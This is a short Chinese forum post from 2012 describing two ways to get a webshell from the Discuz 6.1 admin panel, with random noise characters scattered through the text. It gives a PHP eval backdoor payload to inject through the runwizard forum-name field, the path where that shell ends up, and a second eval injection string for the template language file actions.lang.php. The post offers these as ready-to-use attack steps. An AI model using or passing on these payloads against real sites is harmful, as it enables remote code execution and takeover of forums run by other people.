discuz6.1两种方法后台拿shell7 h7 d! F ?4 y7 e( M( t' P
好多朋友说discuz6.1后台不会拿shell,在前段时间这些都是说不公布的东西,我发出来给大家测试一下
Q" _, r1 \9 y2 {8 u1:
6 w; i! f' Y% f. vhttp://127.0.0.1/discuz/admincp. ... zard&frames=yes
2 y, m4 |/ h* o" f( Radmincp.php?action=runwizard&frames=yes点击下一步然后再论坛名称的地方插入webshell
& n5 ?- ~, r. }# v, d3 b3 j! G! ^<?php eval($_POST[cmd]);?>7 @% D$ u6 x2 B$ G/ k
后台webshell地址:http://127.0.0.1/discuz/forumdata/logs/runwizardlog.php
& ]2 [# m4 Q7 G* p5 H# z
8 j. \* v0 z6 ~& c
0 U- R; j% S% V- d- Y. w6 ]2:后台模板管理--默认模板套系--详情
3 K) f y3 z6 stemplates/default/actions.lang.php
; H! K0 K0 ?' k1 t# Bjhackj\\');eval($_POST[cmd])?>;//
) P& |4 S. s# z+ U6 v: L9 m3 j2 X2 G! {
利用很简单,聪明的人一看就懂了 |
发表于 2012-9-13 16:59:17
收藏
支持
反对